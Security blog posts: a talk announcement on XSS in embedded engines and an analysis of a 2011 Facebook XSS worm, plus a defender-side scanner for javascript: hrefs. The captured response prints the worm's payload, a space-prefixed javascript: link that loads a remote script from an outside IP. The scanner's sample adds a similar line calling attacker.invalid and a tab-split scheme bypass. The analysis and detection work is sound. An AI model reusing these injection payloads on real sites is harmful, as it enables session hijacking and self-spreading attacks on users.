Toorcon Seattle 2011, “XSS Without the Browser”
Posted by Kos on 06/19/2011 at 9:06 am | Last modified: 11/08/2011 6:06 pm
Toorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/Javascript engines, and the potential security risks when they are not implemented securely. An old Skype bug is used as an example.
Tags: conference, facebook, presentation, toorcon, xss | Categories: Hacking, Presentations, XSS
Facebook XSS
Posted by Kos on 04/06/2011 at 8:54 am | Last modified: 11/08/2011 6:05 pm
Some cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a Burp instance beforehand. (Red link is to the actual javascript that sent out messages.)
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.144.114.105
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182
*SNIP*
<div>
<div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
<div>
<a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
</div>
<div>
<h2>Videos Posted by Maria Gonzales</h2>
<div>
<div>
</div>
</div>
</div>
</div>
<div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
<a href=" javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; }" target="_blank" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
</div>
<div id="app205712022786034_video_info" fbcontext="dc593d496581">
<div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
<h3>Teacher Pushes Attacking Bully To The Ground</h3>
<div>
by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">videos</a>)
</div>
<div>
<strong>2:30</strong><br /><br />
</div>
</div>
<div id="app205712022786034_description" fbcontext="dc593d496581">
<div>
He should be commended, but sadly, in todays world, he'll probably get in trouble.
</div>
</div>
<a role="button" href="/ajax/share_dialog.php?s='11&appid=2392950137&p[]=487808128343&p[]=&p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><span>Share</span></a>
<div id="app205712022786034_video_actions" fbcontext="dc593d496581">
<ul>
<li>
<div>
<a href="#" id="app205712022786034_lowqual_toggle" title="watch "bonaparte - menschen live (video) [hd]" in regular quality." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;" fbcontext="dc593d496581">
View in Regular Quality</a>
</div>
<a href="#" id="app205712022786034_highqual_toggle" title="watch "bonaparte - menschen live (video) [hd]" in high quality." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
</li>
<li><a href="/ajax/report.php?content_type='13&cid=487808128343&h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">Report Video</a></li>
</ul>
</div>
</div>
*SNIP*
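The player block in the captured response above delivers its payload through an href whose value starts with a space before javascript:, which browsers strip before parsing the URL. As an added example that is not part of the original post, the scanner below flags href attributes that resolve to a script scheme after that normalization; the sample markup and the host attacker.invalid are constructed.

```javascript
// Added example, not code from the original post: a defender-side scan for
// anchors whose href resolves to the javascript: scheme. Browsers run the
// WHATWG URL parser, which strips leading/trailing C0 controls and spaces and
// removes tab/newline anywhere, so `href=" javascript:..."` still executes.
// Decode numeric character references (&#106; &#x6A;) that may split the scheme.
const fromCp = (cp) => (cp <= 0x10ffff ? String.fromCodePoint(cp) : '\uFFFD');
function decodeNumericEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCp(parseInt(d, 10)));
}
// Normalize the attribute value the way the URL parser does before reading the scheme.
function normalizeUrlForSchemeCheck(raw) {
  return decodeNumericEntities(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}
// Lowercased scheme of an absolute URL, or null for a relative one.
function extractScheme(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}
const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);
// Regex pass over HTML source for href attributes carrying a script scheme.
// Good enough for auditing captured responses; it is not a full HTML parser.
function findScriptSchemeHrefs(html) {
  const findings = [];
  const attrRe = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  let m;
  while ((m = attrRe.exec(html)) !== null) {
    const raw = m[1] !== undefined ? m[1] : m[2];
    const scheme = extractScheme(normalizeUrlForSchemeCheck(raw));
    if (scheme !== null && SCRIPT_SCHEMES.has(scheme)) findings.push({ href: raw, scheme });
  }
  return findings;
}
// Constructed sample (not the captured response): a benign link, an href with
// the leading space seen in the capture, and a tab-split scheme.
const SAMPLE_HTML = `
<a href="http://www.facebook.com/bonaparte"><img src="x.png"></a>
<a href=" javascript:document.body.appendChild(document.createElement('script')).src='http://attacker.invalid/fb.js'" target="_blank">play</a>
<a href="java\tscript:alert(1)">bypass</a>
`;
console.log(findScriptSchemeHrefs(SAMPLE_HTML));
```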
Tags: facebook, worm, xss | Categories: Hacking, XSS